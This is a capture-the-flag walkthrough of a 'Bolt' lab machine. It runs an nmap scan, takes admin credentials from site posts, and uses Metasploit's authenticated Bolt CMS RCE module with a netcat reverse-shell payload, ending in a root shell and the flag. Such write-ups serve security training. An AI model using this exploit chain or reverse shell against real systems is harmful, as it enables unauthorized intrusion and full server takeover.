Bolt
Last updated
Last updated
Using nmap to scan and identify open ports and services
nmap -Pn -sC -sV 10.10.77.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 11:37 IST
Nmap scan report for 10.10.77.161
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
| 256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_ 256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open http (PHP 7.2.32-1)
|_http-title: Bolt | A hero is unleashed
|_http-generator: Bolt
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Sat, 16 Jul 2022 06:08:04 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: private, must-revalidate
| Date: Sat, 16 Jul 2022 06:08:04 GMT
| Content-Type: text/html; charset=UTF-8
| pragma: no-cache
| expires: -1
| X-Debug-Token: 6aa03e
| <!doctype html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| </head>
| <body>
| href="#main-content" class="vis
| GetRequest:
| HTTP/1.0 200 OK
| Date: Sat, 16 Jul 2022 06:08:03 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: public, s-maxage=600
| Date: Sat, 16 Jul 2022 06:08:03 GMT
| Content-Type: text/html; charset=UTF-8
| X-Debug-Token: c9575e
| <!doctype html>
| <html lang="en-GB">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| <link rel="canonical" href="http://0.0.0.0:8000/">
| </head>
|_ <body class="front">
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.92%I=7%D=7/16%Time=62D255C5%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,23DC,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Sat,\x2016\x20Jul\x20
SF:2022\x2006:08:03\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP
SF:/7\.2\.32-1\+ubuntu18\.04\.1\+deb\.sury\.org\+1\r\nCache-Control:\x20pu
SF:blic,\x20s-maxage=600\r\nDate:\x20Sat,\x2016\x20Jul\x202022\x2006:08:03
SF:\x20GMT\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nX-Debug-Toke
SF:n:\x20c9575e\r\n\r\n<!doctype\x20html>\n<html\x20lang=\"en-GB\">\n\x20\
SF:x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20charset=\"u
SF:tf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20
SF:content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<title>Bolt\x20\|\x20A
SF:\x20hero\x20is\x20unleashed</title>\n\x20\x20\x20\x20\x20\x20\x20\x20<l
SF:ink\x20href=\"https://fonts\.googleapis\.com/css\?family=Bitter\|Roboto
SF::400,400i,700\"\x20rel=\"stylesheet\">\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<link\x20rel=\"stylesheet\"\x20href=\"/theme/base-2018/css/bulma\.css\
SF:?8ca0842ebb\">\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"styleshe
SF:et\"\x20href=\"/theme/base-2018/css/theme\.css\?6cb66bfe9f\">\n\x20\x20
SF:\x20\x20\t<meta\x20name=\"generator\"\x20content=\"Bolt\">\n\x20\x20\x2
SF:0\x20\t<link\x20rel=\"canonical\"\x20href=\"http://0\.0\.0\.0:8000/\">\
SF:n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<body\x20class=\"front\">\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20<a\x20")%r(FourOhFourRequest,16C3,"HTTP/1
SF:\.0\x20404\x20Not\x20Found\r\nDate:\x20Sat,\x2016\x20Jul\x202022\x2006:
SF:08:04\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/7\.2\.32-1
SF:\+ubuntu18\.04\.1\+deb\.sury\.org\+1\r\nCache-Control:\x20private,\x20m
SF:ust-revalidate\r\nDate:\x20Sat,\x2016\x20Jul\x202022\x2006:08:04\x20GMT
SF:\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\npragma:\x20no-cache
SF:\r\nexpires:\x20-1\r\nX-Debug-Token:\x206aa03e\r\n\r\n<!doctype\x20html
SF:>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial
SF:-scale=1\.0\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20<title>Bolt\x20\|\x20A\x20hero\x20is\x20unleashed</title>\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"https://fonts\.googleapis\
SF:.com/css\?family=Bitter\|Roboto:400,400i,700\"\x20rel=\"stylesheet\">\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/
SF:theme/base-2018/css/bulma\.css\?8ca0842ebb\">\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/theme/base-2018/css/them
SF:e\.css\?6cb66bfe9f\">\n\x20\x20\x20\x20\t<meta\x20name=\"generator\"\x2
SF:0content=\"Bolt\">\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<body>\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20<a\x20href=\"#main-content\"\x20class=\"v
SF:is");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.61 secondsWe find 3 open ports. 22, 80 and 8000 running ssh and 2 web servers respectively
Going over to port 80, we see that it is a default Apache page, Dead End!
But port 8000 takes us to a webpage built with Bolt CMS
While exploring the webpage, we come across an entry message-from-admin
From here, we get a potential username bolt
Another entry message-for-it-department if found
We get a password boltadmin123
bolt:boltadmin123
Navigating to it, we are redirected to /bolt/login where we can use the credentials obtained above to log in to the admin panel
We can determine that the CMS is Bolt 3.7.1
We find out that metasploit has a module RCE exploit/unix/webapp/bolt_authenticated_rce for Bolt CMS 3.7.0. Might work here
In this module, we need an authenticated user to get a reverse shell, and we go have the credentials, so entering the required options.
[msf](Jobs:0 Agents:0) exploit(unix/webapp/bolt_authenticated_rce) >> show options
Module options (exploit/unix/webapp/bolt_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_TRAVERSAL_PATH ../../../public/files yes Traversal path from "/files" on the web server to "/r
oot" on the server
PASSWORD boltadmin123 yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:por
t][...]
RHOSTS 10.10.77.161 yes The target host(s), see https://github.com/rapid7/met
asploit-framework/wiki/Using-Metasploit
RPORT 8000 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. Thi
s must be an address on the local machine or 0.0.0.0
to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
TARGETURI / yes Base path to Bolt CMS
URIPATH no The URI to use for this exploit (default is random)
USERNAME bolt yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.11.66.165 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Linux (cmd)Running the module, we get a reverse shell as root
[msf](Jobs:0 Agents:0) exploit(unix/webapp/bolt_authenticated_rce) >> run
[*] Started reverse TCP handler on 10.11.66.165:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "kohq".
[*] Found 3 potential token(s) for creating .php files.
[+] Used token 1c3b9a04fc3cb01b6deb1b3106 to create uhgsvcorq.php.
[*] Attempting to execute the payload via "/files/uhgsvcorq.php?kohq=`payload`"
[!] No response, may have executed a blocking payload!
[*] Command shell session 1 opened (10.11.66.165:4444 -> 10.10.77.161:57448) at 2022-07-16 11:58:22 +0530
[+] Deleted file uhgsvcorq.php.
[+] Reverted user profile back to original state.
whoami
root
shell
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
root@bolt:~/public/files# Finding the flag.txt
root@bolt:/root find / -name flag.txt -type f 2>/dev/null
/home/flag.txt
root@bolt:/root cat /home/flag.txtWhile reading the of Bolt CMS, we come across the endpoint /bolt which is the default directly for Bolt CMS backend
